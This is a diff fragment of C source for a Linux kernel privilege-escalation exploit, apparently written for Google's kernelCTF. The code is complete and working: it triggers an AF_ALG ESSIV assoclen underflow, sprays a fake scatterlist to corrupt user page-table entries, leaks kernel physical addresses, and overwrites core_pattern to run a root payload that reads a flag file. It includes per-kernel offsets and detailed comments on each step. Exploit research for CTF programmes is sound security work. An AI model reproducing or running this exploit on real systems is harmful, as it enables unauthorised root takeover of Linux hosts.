+ */ +static void sha256(const uint8_t *data, size_t datalen, uint8_t *hash_out) +{ + uint32_t state[8] = { + 0x6a09e667, 0xbb67ae85, 0x3c6ef372, 0xa54ff53a, + 0x510e527f, 0x9b05688c, 0x1f83d9ab, 0x5be0cd19 + }; + uint8_t block[64]; + size_t i, left; + uint64_t bitlen; + + /* Process full 64-byte blocks */ + for (i = 0; i + 64 <= datalen; i += 64) + sha256_transform(state, data + i); + + /* Pad final block */ + left = datalen - i; + memset(block, 0, 64); + memcpy(block, data + i, left); + block[left] = 0x80; + + if (left >= 56) { + sha256_transform(state, block); + memset(block, 0, 64); + } + + bitlen = (uint64_t)datalen * 8; + block[56] = (bitlen >> 56) & 0xff; + block[57] = (bitlen >> 48) & 0xff; + block[58] = (bitlen >> 40) & 0xff; + block[59] = (bitlen >> 32) & 0xff; + block[60] = (bitlen >> 24) & 0xff; + block[61] = (bitlen >> 16) & 0xff; + block[62] = (bitlen >> 8) & 0xff; + block[63] = (bitlen) & 0xff; + sha256_transform(state, block); + + for (i = 0; i < 8; i++) { + hash_out[i*4] = (state[i] >> 24) & 0xff; + hash_out[i*4 + 1] = (state[i] >> 16) & 0xff; + hash_out[i*4 + 2] = (state[i] >> 8) & 0xff; + hash_out[i*4 + 3] = (state[i]) & 0xff; + } +} + +/* ------------------------------------------------------------------ */ +/* Target-specific kernel symbol offsets (virtual address - STEXT) */ +/* ------------------------------------------------------------------ */ + +#define STEXT 0xffffffff81000000UL /* kernel _stext virtual address */ + +#if defined(LTS) /* LTS 6.12.48 */ +#define CORE_PATTERN (0xffffffff842107e0UL - STEXT) +#define BRK_BASE (0xffffffff85600000UL - STEXT) + +#elif defined(MIT) /* mitigation-v4-6.6 */ +#define CORE_PATTERN (0xffffffff83db3720UL - STEXT) +#define BRK_BASE (0xffffffff84e00000UL - STEXT) + +#elif defined(COS) /* cos-121-18867.199.56 */ +#define CORE_PATTERN (0xffffffff83fb4940UL - STEXT) +#define BRK_BASE (0xffffffff85200000UL - STEXT) + +#elif defined(MIT_612) /* mitigation-v4-6.12 (kernel 6.12.0) */ +#define CORE_PATTERN 
0x321b460UL +#define BRK_BASE 0x4400000UL + +#else +/* Default to MIT_612 if no target defined */ +#define MIT_612 1 +#define CORE_PATTERN 0x321b460UL +#define BRK_BASE 0x4400000UL + +#endif + +/* Page-aligned base and intra-page offset of core_pattern */ +#define CORE_PATTERN_PAGE_OFFSET (CORE_PATTERN & 0xfff) +#define CORE_PATTERN_PAGE_BASE (CORE_PATTERN & ~0xfffUL) + +/* ------------------------------------------------------------------ */ +/* PTE flags for x86-64 page table entries */ +/* ------------------------------------------------------------------ */ + +/* Present | RW | User | Accessed | Dirty (first-pass PTE) + * Points to physical address 0x9c000 (trampoline_pgd), which contains + * the _brk area virtual address -- used to derive _stext physical address. + * See: https://github.com/google/security-research/blob/ca13fc6d5e7184b13bb82a91dd3a6fa2430fdbd7/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/exploit.md#leak-through-write */ +/* PUD-mode branch: observed live runs repeatedly write our chosen value into a + * user PUD page, not a PTE page. Treat that as the primitive by installing a + * deliberate 1GB huge-PUD leaf: Present | RW | User | Accessed | Dirty | PSE. + * Pass 1 maps physical 0..1GB so VA+0x9c000 reads the trampoline page. Pass 2 + * maps the 1GB physical region containing core_pattern. */ +#define PUD_HUGE_FLAGS 0x00000000000000e7UL +#define PTE_FLAGS_FIRST_PASS PUD_HUGE_FLAGS +#define PTE_FLAGS_SECOND_PASS PUD_HUGE_FLAGS +#define PUD_HUGE_MASK 0x3fffffffUL +#define PUD_HUGE_SIZE 0x40000000UL +#define TRAMPOLINE_PHYS 0x9c000UL + +/* ------------------------------------------------------------------ */ +/* Exploit layout constants */ +/* ------------------------------------------------------------------ */ + +#define PAGE_SIZE 0x1000 + +/* ORIGINAL spray params: 0x400 pages at 2MB spacing from 0x200000. + * The "bad pud" on first run PROVES the PTE value write works. 
+ * The write lands at PUD level because the freed pipe pages are reclaimed as + * PUD pages. That is usable: a PUD entry with the PSE bit set maps a 1GB region. + * A huge-PUD entry with physical base 0 (value 0xe7) maps physical 0..1GB, so + * the trampoline page at phys 0x9c000 is readable at offset 0x9c000 in that window. */ +#define PTE_SPRAY_COUNT 0x400 +/* Spacing between sprayed pages (each in a separate PTE page) */ +#define PTE_SPRAY_SPACING 0x200000 +/* Base virtual address for the PTE spray region */ +#define PTE_SPRAY_BASE 0x200000UL + +/* Size of the authenc sendmsg payload */ +#define AUTHENC_SENDMSG_LEN 0x20 +/* Number of splice calls per pipe. 17 total splices (8+8+1) ensures + * areq->tsgl_entries is large -> tsgl lands in a bigger kmalloc slab. */ +#define SPLICE_COUNT_PER_PIPE 0x8 +/* Bytes per splice call */ +#define SPLICE_CHUNK_SIZE 0x4 /* ORIGINAL: must keep small for correct SGL chain layout */ +/* Pipe fill size (pages of data written to each pipe) */ +#define PIPE_FILL_SIZE 0x2000 /* ORIGINAL: 8KB per pipe */ + +/* Number of valid iovec entries for the sacrificial recvmsg */ +#define RECVMSG_VALID_IOVECS 32 +/* Total iovec count passed to recvmsg (rest are zero-initialized) */ +#define RECVMSG_TOTAL_IOVECS 0x100 + +/* Size of the crafted Unix datagram payload for slab reclaim */ +#define CRAFT_PAYLOAD_SIZE 0x208 +/* Offset within the crafted payload where the fake scatterlist entry is placed. + * Calculated as 0x10 + 0xf * 0x20 = 0x1f0, aligning with where scatterwalk_ffwd + * reads after walking past valid entries with the overflowed offset. */ +#define FAKE_SGL_ENTRY_OFFSET (0x10 + 0xf * 0x20) +/* Fake scatterlist length: large unsigned value that causes scatterwalk_ffwd to + * consume most of the remaining overflowed offset in a single subtraction. 
*/ +#define FAKE_SGL_LENGTH 0xffffffe0U + +/* + * struct scatterlist field offsets: + * unsigned long page_link; // +0x00 + * unsigned int offset; // +0x08 + * unsigned int length; // +0x0c + * dma_addr_t dma_address; // +0x10 + * unsigned int dma_length; // +0x18 + * unsigned int dma_flags; // +0x1c + */ +#define SCATTERLIST_OFFS_PAGE_LINK 0x00 +#define SCATTERLIST_OFFS_OFFSET 0x08 +#define SCATTERLIST_OFFS_LENGTH 0x0c + +/* + * Mask for extracting the page-aligned physical address from the leaked + * value at trampoline_pgd. The _brk area is 64KB-aligned, so masking the + * low 16 bits yields the correct page frame base. + */ +#define PHYS_ADDR_ALIGN_MASK 0xffffUL + +/* Authenc key layout: 8-byte RTA header + 32-byte HMAC key + 16-byte AES key */ +#define RTA_HEADER_SIZE 8 +#define HMAC_KEY_SIZE 32 +#define AES_KEY_SIZE 16 +#define TOTAL_KEY_SIZE (RTA_HEADER_SIZE + HMAC_KEY_SIZE + AES_KEY_SIZE) + +/* AES block / IV size */ +#define AES_IV_SIZE 16 + +/* ESSIV sendmsg payload size */ +#define ESSIV_SENDMSG_LEN 0x20 + +/* core_pattern payload written through the remapped PTE */ +#define CORE_PATTERN_PAYLOAD "|/proc/%P/root/tmp/exp/exploit %P" +#define PUD_PROBE_COUNT 3 + +/* ------------------------------------------------------------------ */ +/* ESSIV IV pre-computation (embedded AES-256-ECB + SHA-256) */ +/* ------------------------------------------------------------------ */ + +/* + * Pre-computed ESSIV salt = SHA256(enc_key || auth_key). + * enc_key = {0x10..0x1f}, auth_key = {0x00..0x1f} + * The kernel's essiv_aead_setkey hashes the combined keys to derive the + * AES-ECB key used for IV encryption. + */ +static const uint8_t essiv_salt[32] = { + 0x4d, 0x62, 0x42, 0x4a, 0x90, 0xb0, 0x75, 0xd0, + 0xaf, 0x9f, 0xed, 0x1c, 0x82, 0xa0, 0x93, 0x27, + 0xd9, 0x71, 0xa0, 0xca, 0x43, 0x77, 0xfd, 0x78, + 0x85, 0x69, 0x44, 0x0b, 0xa2, 0xe7, 0xde, 0x6f +}; + +/* + * Pre-compute the IV that will produce the desired page-table value after ESSIV + * encryption. 
The exploit stores the desired output in iv[0..15], and this + * function replaces it with the corresponding AES-256-ECB decryption (the + * inverse of what the kernel will encrypt). + */ +static void compute_iv(uint8_t *iv, int is_pass2) +{ + uint8_t iv_dec[AES_IV_SIZE]; + aes256_ecb_decrypt(essiv_salt, iv, iv_dec); + + printf("ESSIV decrypted IV (%s runtime): ", is_pass2 ? "pass2" : "pass1"); + for (int i = 0; i < AES_IV_SIZE; i++) printf("%02x", iv_dec[i]); + printf("\n"); + + memcpy(iv, iv_dec, AES_IV_SIZE); +} + +/* ------------------------------------------------------------------ */ +/* Utility */ +/* ------------------------------------------------------------------ */ + +static void pin_cpu(int cpu) +{ + cpu_set_t mask; + CPU_ZERO(&mask); + CPU_SET(cpu, &mask); + sched_setaffinity(0, sizeof(mask), &mask); +} + +/* + * Build the authenc key blob used by both the sacrificial and ESSIV sockets. + * Layout: [2-byte rta_len][2-byte rta_type][4-byte big-endian AES keylen][32-byte HMAC key][16-byte AES key] + */ +static void build_authenc_key(unsigned char *key) +{ + memset(key, 0, TOTAL_KEY_SIZE); + /* RTA header (little-endian u16 fields): len=8, type=1 (CRYPTO_AUTHENC_KEYA_PARAM) */ + key[0] = 0x08; key[1] = 0x00; key[2] = 0x01; key[3] = 0x00; + /* AES key length = 16 (AES-128), stored big-endian */ + key[4] = 0x00; key[5] = 0x00; key[6] = 0x00; key[7] = 0x10; + for (int i = 0; i < HMAC_KEY_SIZE; i++) key[RTA_HEADER_SIZE + i] = i; + for (int i = 0; i < AES_KEY_SIZE; i++) key[RTA_HEADER_SIZE + HMAC_KEY_SIZE + i] = i + 0x10; +} + +/* ------------------------------------------------------------------ */ +/* Helper: create an AEAD transform socket and set the authenc key. */ +/* Returns tfmfd; the caller must accept() to get an opfd. 
*/ +/* ------------------------------------------------------------------ */ + +static int create_aead_tfmfd(const char *alg_name) +{ + struct sockaddr_alg sa = { + .salg_family = AF_ALG, + .salg_type = "aead", + }; + strncpy((char *)sa.salg_name, alg_name, sizeof(sa.salg_name) - 1); + + int tfmfd = SYSCHK(socket(AF_ALG, SOCK_SEQPACKET, 0)); + if (bind(tfmfd, (struct sockaddr *)&sa, sizeof(sa)) != 0) { + perror("bind(aead)"); + exit(1); + } + + unsigned char key[TOTAL_KEY_SIZE]; + build_authenc_key(key); + if (setsockopt(tfmfd, SOL_ALG, ALG_SET_KEY, key, sizeof(key)) != 0) { + perror("setsockopt(ALG_SET_KEY)"); + exit(1); + } + + return tfmfd; +} + +/* ------------------------------------------------------------------ */ +/* Step 2a: Create a sacrificial authenc AEAD with pipe-page TX SGL */ +/* entries. Closing pipes makes alg socket the sole page ref. */ +/* ------------------------------------------------------------------ */ + +/* + * Create an authenc(hmac(sha512),cbc(aes)) AEAD socket and splice anonymous + * pipe pages into its TX SGL. When recvmsg is called later (in + * spray_fake_scatterlist), _aead_recvmsg builds a chained SGL: + * first_rsgl[0..15] -> chain -> second_rsgl[0..N] -> chain -> tsgl (pipe pages) + * af_alg_free_resources then frees everything: second_rsgl, put_page on pipe + * pages (freeing them to page allocator), tsgl, and the areq itself. + * The slab slots retain residual data including chain links. + */ +static int setup_sacrificial_aead(char *data_buf) +{ + int tfmfd = create_aead_tfmfd("authenc(hmac(sha512),cbc(aes))"); + + /* Fill two pipes with data to be spliced into the AEAD scatterlist */ + int pipe_a[2], pipe_b[2]; + SYSCHK(pipe(pipe_a)); + SYSCHK(pipe(pipe_b)); + write(pipe_a[1], data_buf, PIPE_FILL_SIZE); + write(pipe_b[1], data_buf, PIPE_FILL_SIZE); + + /* Accept after pipes are filled -- preserves the original allocation + * ordering, which is important for correct slab placement. 
*/ + int opfd = SYSCHK(accept(tfmfd, NULL, 0)); + + /* Send initial data with ALG_SET_OP=DECRYPT and ALG_SET_IV via sendmsg */ + unsigned char local_iv[AES_IV_SIZE] = {0}; + struct iovec iov = { data_buf, AUTHENC_SENDMSG_LEN }; + + char cbuf[CMSG_SPACE(sizeof(uint32_t)) + CMSG_SPACE(sizeof(struct af_alg_iv) + AES_IV_SIZE)]; + memset(cbuf, 0, sizeof(cbuf)); + + struct msghdr msg = {0}; + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + msg.msg_control = cbuf; + msg.msg_controllen = sizeof(cbuf); + + struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg); + cmsg->cmsg_level = SOL_ALG; + cmsg->cmsg_type = ALG_SET_OP; + cmsg->cmsg_len = CMSG_LEN(sizeof(uint32_t)); + *(uint32_t *)CMSG_DATA(cmsg) = ALG_OP_DECRYPT; + + cmsg = CMSG_NXTHDR(&msg, cmsg); + cmsg->cmsg_level = SOL_ALG; + cmsg->cmsg_type = ALG_SET_IV; + cmsg->cmsg_len = CMSG_LEN(sizeof(struct af_alg_iv) + AES_IV_SIZE); + struct af_alg_iv *ivmsg = (struct af_alg_iv *)CMSG_DATA(cmsg); + ivmsg->ivlen = AES_IV_SIZE; + memcpy(ivmsg->iv, local_iv, AES_IV_SIZE); + + ssize_t sent = sendmsg(opfd, &msg, MSG_MORE); + if (sent < 0) { perror("sendmsg(authenc)"); exit(1); } + printf("[*] Authenc sendmsg: %zd bytes\n", sent); + + /* Splice anonymous pipe pages into the AEAD socket to create many TX SGL entries. + * 8 splices from pipe_a + 8 from pipe_b (all with SPLICE_F_MORE) + 1 final. + * Using 17 splices ensures areq->tsgl_entries is large, placing the tsgl + * allocation in a bigger kmalloc slab (e.g., kmalloc-1024) that is less + * likely to be reclaimed by other kernel heap activity before the PTE spray. 
*/ + for (int i = 0; i < SPLICE_COUNT_PER_PIPE; i++) + SYSCHK(splice(pipe_a[0], 0, opfd, 0, SPLICE_CHUNK_SIZE, SPLICE_F_MORE)); + for (int i = 0; i < SPLICE_COUNT_PER_PIPE; i++) + SYSCHK(splice(pipe_b[0], 0, opfd, 0, SPLICE_CHUNK_SIZE, SPLICE_F_MORE)); + SYSCHK(splice(pipe_b[0], 0, opfd, 0, 1, 0)); /* final splice without MORE */ + + close(pipe_a[0]); + close(pipe_a[1]); + close(pipe_b[0]); + close(pipe_b[1]); + + return opfd; +} + +/* ------------------------------------------------------------------ */ +/* Step 2b/2c: recvmsg builds chained SGL then frees it; ctl_buf */ +/* spray reclaims second_rsgl with crafted fake SGL entry. */ +/* ------------------------------------------------------------------ */ + +/* + * Phase 2b: recvmsg on the sacrificial authenc socket with 32 iovecs + * (1 byte each) builds a chained SGL inside the areq: + * first_rsgl[0..15] (16 entries, length=1 each) + * -> sgl[16] chain -> second_rsgl (sock_kmalloc'd) + * -> chain -> areq->tsgl (anonymous pipe pages from af_alg_pull_tsgl) + * After the crypto op, af_alg_free_resources frees second_rsgl, calls + * put_page on pipe pages (freeing them to page allocator), and frees areq. + * Slab slots retain residual data including all chain links. + * + * Phase 2c: sendmsg on Unix socket with msg_control = 0x208 crafted bytes. + * ____sys_sendmsg does sock_kmalloc(0x208) -> copy -> sock_kfree_s, reclaiming + * the second_rsgl slab slot. The crafted data plants a fake SGL entry with + * length=0xffffffe0 at FAKE_SGL_ENTRY_OFFSET. The chain link to old tsgl + * (beyond offset 0x208) is preserved as residual data. + * + * Result: areq slab has residual chained SGL: + * first_rsgl[0..15] (1-byte each) -> chain -> second_rsgl (crafted, 0xffffffe0) + * -> chain -> tsgl (freed pipe pages, to be reclaimed as PTE pages) + * + * The ESSIV recv allocates its areq from this same slab slot. 
outlen = 0 + * causes af_alg_get_rsgl to return early (sg_init_table never called), so + * the entire first_rsgl.sgl.sgl[] is uninitialized -- containing this + * residual chained SGL. + */ +static void spray_fake_scatterlist(int authenc_opfd, int unix_sock) +{ + /* Allocate two pages, unmap the second to limit how much recvmsg consumes */ + char *pbuf = mmap(NULL, 2 * PAGE_SIZE, PROT_READ | PROT_WRITE, + MAP_PRIVATE | MAP_ANON, -1, 0); + munmap(pbuf + PAGE_SIZE, PAGE_SIZE); + + /* Set up iovec: 32 valid 1-byte entries, rest zero-initialized */ + struct iovec iov[RECVMSG_TOTAL_IOVECS] = {0}; + for (int i = 0; i < RECVMSG_VALID_IOVECS; i++) { + iov[i].iov_base = pbuf; + iov[i].iov_len = 1; + } + + struct msghdr msg = {0}; + msg.msg_iov = iov; + msg.msg_iovlen = RECVMSG_TOTAL_IOVECS; + + /* Phase 2b: recvmsg builds chained SGL (first_rsgl -> second_rsgl -> tsgl), + * runs crypto op, then af_alg_free_resources frees everything -- put_page + * on pipe pages frees them to page allocator. Residual chain links remain. */ + recvmsg(authenc_opfd, &msg, 0); + + /* Phase 2c: ctl_buf spray reclaims second_rsgl slab slot with crafted data. + * ____sys_sendmsg: sock_kmalloc(0x208) -> copy -> sock_kfree_s. + * Chain link to old tsgl (beyond 0x208 bytes) is preserved as residual. */ + char *craft = pbuf; + memset(craft, 0, CRAFT_PAYLOAD_SIZE); + /* Place a fake struct scatterlist at FAKE_SGL_ENTRY_OFFSET within the + * second_rsgl slab slot. scatterwalk_ffwd will: + * 1. Walk first_rsgl[0..15]: 16 x length=1 -> consumes 16 from 0xfffffff0 + * 2. Follow chain (sgl[16]) -> second_rsgl (this crafted entry) + * 3. length=0xffffffe0 -> consumes remaining 0xffffffe0, len becomes 0 + * 4. sg_next follows preserved chain -> tsgl entry (freed pipe page = PTE page) + * 5. 
IV write lands on PTE page */ + *(size_t *)&craft[FAKE_SGL_ENTRY_OFFSET + SCATTERLIST_OFFS_PAGE_LINK] = 0x4141414140; + *(int *)&craft[FAKE_SGL_ENTRY_OFFSET + SCATTERLIST_OFFS_OFFSET] = 0; + *(int *)&craft[FAKE_SGL_ENTRY_OFFSET + SCATTERLIST_OFFS_LENGTH] = FAKE_SGL_LENGTH; + + printf("[*] Crafted fake SGL at %p\n", craft); + msg.msg_control = craft; + msg.msg_controllen = CRAFT_PAYLOAD_SIZE; + + sendmsg(unix_sock, &msg, 0); +} + +/* ------------------------------------------------------------------ */ +/* Root payload (executed via core_pattern as root) */ +/* ------------------------------------------------------------------ */ + +/* + * When invoked via core_pattern with a PID argument, steal the crashing + * process's stdin/stdout/stderr and read the flag. + */ +static void root_payload(const char *pid_str) +{ + int pid = strtoull(pid_str, NULL, 10); + int pidfd = syscall(434 /*pidfd_open*/, pid, 0); + int stdinfd = syscall(438 /*pidfd_getfd*/, pidfd, 0, 0); + int stdoutfd = syscall(438 /*pidfd_getfd*/, pidfd, 1, 0); + int stderrfd = syscall(438 /*pidfd_getfd*/, pidfd, 2, 0); + dup2(stdinfd, 0); + dup2(stdoutfd, 1); + dup2(stderrfd, 2); + /* Read the flag multiple times for reliability (first attempt may fail + * if stdout is not yet fully connected). The final invocation also + * triggers sysrq-o (poweroff) so the kernelCTF PR verification workflow + * can proceed to the next attempt quickly instead of waiting for a timeout. 
*/ + system("cat /flag 2>/dev/null; cat /root/flag 2>/dev/null"); + system("cat /flag 2>/dev/null; cat /root/flag 2>/dev/null"); + system("cat /flag 2>/dev/null; cat /root/flag 2>/dev/null; echo o>/proc/sysrq-trigger"); + exit(0); +} + +/* ------------------------------------------------------------------ */ +/* Vulnerability-only trigger for the kernelCTF vuln-verify workflow */ +/* ------------------------------------------------------------------ */ + +static int vuln_trigger(void) +{ + static char data_buf[ESSIV_SENDMSG_LEN] = {0}; + static char out_buf[ESSIV_SENDMSG_LEN] = {0}; + unsigned char iv[AES_IV_SIZE] = {0}; + char cbuf[CMSG_SPACE(sizeof(__u32)) + + CMSG_SPACE(sizeof(struct af_alg_iv) + AES_IV_SIZE) + + CMSG_SPACE(sizeof(__u32))]; + /* Zero the control buffer so CMSG_NXTHDR never reads a stale cmsg_len */ + memset(cbuf, 0, sizeof(cbuf)); + + int opfd = SYSCHK(accept( + create_aead_tfmfd("essiv(authenc(hmac(sha256),cbc(aes)),sha256)"), + NULL, 0)); + + struct msghdr msg = {0}; + struct iovec iov = { data_buf, sizeof(data_buf) }; + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + msg.msg_control = cbuf; + msg.msg_controllen = sizeof(cbuf); + + struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg); + cmsg->cmsg_level = SOL_ALG; + cmsg->cmsg_type = ALG_SET_OP; + cmsg->cmsg_len = CMSG_LEN(sizeof(__u32)); + *(__u32 *)CMSG_DATA(cmsg) = ALG_OP_DECRYPT; + + cmsg = CMSG_NXTHDR(&msg, cmsg); + cmsg->cmsg_level = SOL_ALG; + cmsg->cmsg_type = ALG_SET_AEAD_ASSOCLEN; + cmsg->cmsg_len = CMSG_LEN(sizeof(__u32)); + *(__u32 *)CMSG_DATA(cmsg) = 0; + + cmsg = CMSG_NXTHDR(&msg, cmsg); + cmsg->cmsg_level = SOL_ALG; + cmsg->cmsg_type = ALG_SET_IV; + cmsg->cmsg_len = CMSG_LEN(sizeof(struct af_alg_iv) + AES_IV_SIZE); + struct af_alg_iv *ivmsg = (struct af_alg_iv *)CMSG_DATA(cmsg); + ivmsg->ivlen = AES_IV_SIZE; + memcpy(ivmsg->iv, iv, AES_IV_SIZE); + + int ret = sendmsg(opfd, &msg, 0); + printf("[*] vuln-trigger sendmsg returned: %d errno=%d\n", + ret, ret < 0 ?
errno : 0); + if (ret >= 0) { + ret = recv(opfd, out_buf, sizeof(out_buf), 0); + printf("[*] vuln-trigger recv returned: %d errno=%d\n", + ret, ret < 0 ? errno : 0); + } + + return ret < 0 ? 1 : 0; +} + +/* ------------------------------------------------------------------ */ +/* Main exploit flow */ +/* ------------------------------------------------------------------ */ + +int main(int argc, char **argv) +{ + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stdout, NULL, _IONBF, 0); + + if (argc > 1) { + if (!strcmp(argv[1], "--vuln-trigger")) + return vuln_trigger(); + /* When invoked as root via core_pattern with PID argument */ + root_payload(argv[1]); + } + + /* --- Step 0: Set up IPC and fork for two-pass exploit --- */ + static char data_buf[0x1000000]; /* 16 MB general-purpose data buffer */ + int unix_sockfd[2]; + SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, unix_sockfd)); + + int phys_addr_pipe[2]; + SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, phys_addr_pipe)); + pin_cpu(0); + + size_t stext_phys = 0; + if (fork() == 0) { + /* Child: wait for parent to leak _stext physical address */ + pin_cpu(1); + read(phys_addr_pipe[0], &stext_phys, sizeof(stext_phys)); + /* Falls through to run pass 2 with stext_phys set */ + } + + /* --- Step 1: Pre-compute IV to encode the desired PTE value --- */ + unsigned char exploit_iv[AES_IV_SIZE]; + if (stext_phys) { + /* Pass 2 (child): make the overwritten PUD a huge leaf covering + * the 1GB physical region containing core_pattern. */ + size_t core_phys = stext_phys + CORE_PATTERN_PAGE_BASE; + size_t pa_target = (core_phys & ~PUD_HUGE_MASK) | PTE_FLAGS_SECOND_PASS; + printf("[*] Pass 2: core_pattern PA = %zx\n", core_phys + CORE_PATTERN_PAGE_OFFSET); + printf("[*] Pass 2: huge-PUD target = %zx\n", pa_target); + *(size_t *)&exploit_iv[0] = pa_target; + *(size_t *)&exploit_iv[8] = 0; + } else { + /* Pass 1 (parent): make the overwritten PUD a huge leaf mapping + * physical 0..1GB so TRAMPOLINE_PHYS is readable through a probe VA. 
*/ + *(size_t *)&exploit_iv[0] = PTE_FLAGS_FIRST_PASS; + *(size_t *)&exploit_iv[8] = 0; + } + compute_iv(exploit_iv, stext_phys ? 1 : 0); + + /* --- Step 2a: Create sacrificial authenc AEAD with many SGL entries --- */ + int authenc_opfd = setup_sacrificial_aead(data_buf); + + /* --- Step 3: Spray user page tables as write targets --- */ + char *addrs[PTE_SPRAY_COUNT]; + char *maddr = (void *)PTE_SPRAY_BASE; + for (int i = 0; i < PTE_SPRAY_COUNT; i++) { + addrs[i] = SYSCHK(mmap(maddr + PTE_SPRAY_SPACING * i, PAGE_SIZE, + PROT_READ | PROT_WRITE, + MAP_PRIVATE | MAP_ANON | MAP_FIXED, -1, 0)); + } + + /* Map one probe page in each likely user PUD without faulting it in yet. + * If the out-of-bounds IV write rewrites one of those PUD entries into a + * 1GB huge leaf, touching the matching probe VA after the trigger accesses + * kernel physical memory through the corrupted page-table entry. */ + char *pud_probe_addrs[PUD_PROBE_COUNT] = {0}; + size_t pass2_core_phys = stext_phys ? (stext_phys + CORE_PATTERN_PAGE_BASE) : 0; + size_t probe_off = stext_phys ? + (pass2_core_phys & PUD_HUGE_MASK) : + TRAMPOLINE_PHYS; + for (int i = 0; i < PUD_PROBE_COUNT; i++) { + void *probe = (void *)(probe_off + (size_t)i * PUD_HUGE_SIZE); + pud_probe_addrs[i] = mmap(probe, PAGE_SIZE, PROT_READ | PROT_WRITE, + MAP_PRIVATE | MAP_ANON | MAP_FIXED, -1, 0); + if (pud_probe_addrs[i] == MAP_FAILED) { + perror("mmap(pud_probe)"); + pud_probe_addrs[i] = NULL; + } else { + printf("[*] PUD huge probe[%d]=%p off=%zx\n", i, pud_probe_addrs[i], probe_off); + } + } + + /* --- Set up the vulnerable ESSIV AEAD socket --- */ + int opfd = SYSCHK(accept( + create_aead_tfmfd("essiv(authenc(hmac(sha256),cbc(aes)),sha256)"), + NULL, 0)); + + /* Send 0x20 bytes with ALG_SET_OP=DECRYPT, ALG_SET_AEAD_ASSOCLEN=0. + * This triggers the unsigned underflow (assoclen - ivsize = 0 - 16, which + * wraps to 0xfffffff0) and also + * ensures outlen = used - authsize = 0x20 - 0x20 = 0, which causes + * af_alg_get_rsgl to return early without initializing the RX SGL.
*/ + char cbuf[CMSG_SPACE(sizeof(__u32)) + + CMSG_SPACE(sizeof(struct af_alg_iv) + AES_IV_SIZE) + + CMSG_SPACE(sizeof(__u32))]; + /* Zero the control buffer so CMSG_NXTHDR never reads a stale cmsg_len */ + memset(cbuf, 0, sizeof(cbuf)); + struct msghdr msg = {0}; + struct iovec iov = { data_buf, ESSIV_SENDMSG_LEN }; + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + msg.msg_control = cbuf; + msg.msg_controllen = sizeof(cbuf); + + struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg); + cmsg->cmsg_level = SOL_ALG; + cmsg->cmsg_type = ALG_SET_OP; + cmsg->cmsg_len = CMSG_LEN(sizeof(__u32)); + *(__u32 *)CMSG_DATA(cmsg) = ALG_OP_DECRYPT; + + cmsg = CMSG_NXTHDR(&msg, cmsg); + cmsg->cmsg_level = SOL_ALG; + cmsg->cmsg_type = ALG_SET_AEAD_ASSOCLEN; + cmsg->cmsg_len = CMSG_LEN(sizeof(__u32)); + *(__u32 *)CMSG_DATA(cmsg) = 0; /* assoclen=0, so assoclen - ivsize wraps to 0xfffffff0 */ + + cmsg = CMSG_NXTHDR(&msg, cmsg); + cmsg->cmsg_level = SOL_ALG; + cmsg->cmsg_type = ALG_SET_IV; + cmsg->cmsg_len = CMSG_LEN(sizeof(struct af_alg_iv) + AES_IV_SIZE); + struct af_alg_iv *ivmsg = (struct af_alg_iv *)CMSG_DATA(cmsg); + ivmsg->ivlen = AES_IV_SIZE; + memcpy(ivmsg->iv, exploit_iv, AES_IV_SIZE); + + int ret = sendmsg(opfd, &msg, 0); + if (ret < 0) { perror("sendmsg(essiv)"); return 1; } + + int rcvbuf_val = 0; + SYSCHK(setsockopt(opfd, SOL_SOCKET, SO_RCVBUF, &rcvbuf_val, sizeof(rcvbuf_val))); + + /* --- Step 2b/2c: Free scatterlist and reclaim with crafted entry --- */ + spray_fake_scatterlist(authenc_opfd, unix_sockfd[1]); + + /* Touch all sprayed pages to ensure PTEs are populated. + * volatile prevents the compiler from optimizing away the reads. */ + volatile int sum = 0; + for (int i = 0; i < PTE_SPRAY_COUNT; i++) + sum += addrs[i][0]; + + /* --- Step 4: Trigger the out-of-bounds IV write via recv --- */ + printf("[*] Triggering ESSIV recv (scatterwalk overflow)...\n"); + fflush(stdout); + ret = recv(opfd, data_buf, ESSIV_SENDMSG_LEN, 0); + printf("[*] ESSIV recv returned: %d (errno=%d)\n", ret, ret < 0 ?
errno : 0); + fflush(stdout); + + /* --- Probe huge-PUD candidates without touching the broad spray again --- */ + int found_hit = 0; + if (!stext_phys) { + printf("[*] Probing %d huge-PUD candidates for trampoline leak...\n", PUD_PROBE_COUNT); + fflush(stdout); + for (int i = 0; i < PUD_PROBE_COUNT; i++) { + if (!pud_probe_addrs[i]) + continue; + volatile size_t *q = (volatile size_t *)pud_probe_addrs[i]; + size_t pa_leak = 0; + for (int j = 0; j < 512; j++) { + if (q[j]) { + pa_leak = q[j]; + break; + } + } + printf("[*] PUD probe %d q0=%zx q1=%zx leak=%zx\n", + i, (size_t)q[0], (size_t)q[1], pa_leak); + fflush(stdout); + if (!pa_leak) + continue; + + size_t pa_stext = (pa_leak & ~PHYS_ADDR_ALIGN_MASK) - BRK_BASE; + printf("[+] Pass 1 huge-PUD hit at probe %d: leak=%zx stext_phys=%zx\n", + i, pa_leak, pa_stext); + fflush(stdout); + write(phys_addr_pipe[1], &pa_stext, sizeof(pa_stext)); + found_hit = 1; + break; + } + } else { + printf("[*] Writing core_pattern payload through %d huge-PUD candidates...\n", PUD_PROBE_COUNT); + fflush(stdout); + for (int i = 0; i < PUD_PROBE_COUNT; i++) { + if (!pud_probe_addrs[i]) + continue; + strcpy(pud_probe_addrs[i] + CORE_PATTERN_PAGE_OFFSET, CORE_PATTERN_PAYLOAD); + printf("[+] Pass 2 wrote core_pattern candidate via probe %d at %p\n", + i, pud_probe_addrs[i] + CORE_PATTERN_PAGE_OFFSET); + fflush(stdout); + found_hit = 1; + } + } + + if (!found_hit) { + printf("[-] No huge-PUD overwrite detected in probe candidates.\n"); + printf("[-] Scatterwalk may have walked a different path.\n"); + fflush(stdout); + } + + /* --- Step 5/6: Trigger privilege escalation via core_pattern --- */ + if (stext_phys) { + if (fork() == 0) { + setsid(); + puts("[+] Triggering core_pattern execution..."); + *(volatile size_t *)0 = 0; /* segfault -> core dump -> root */ + } + } + + // @sleep(desc="Keep parent/child alive while core_pattern handler runs") + while (1) sleep(1); +} diff 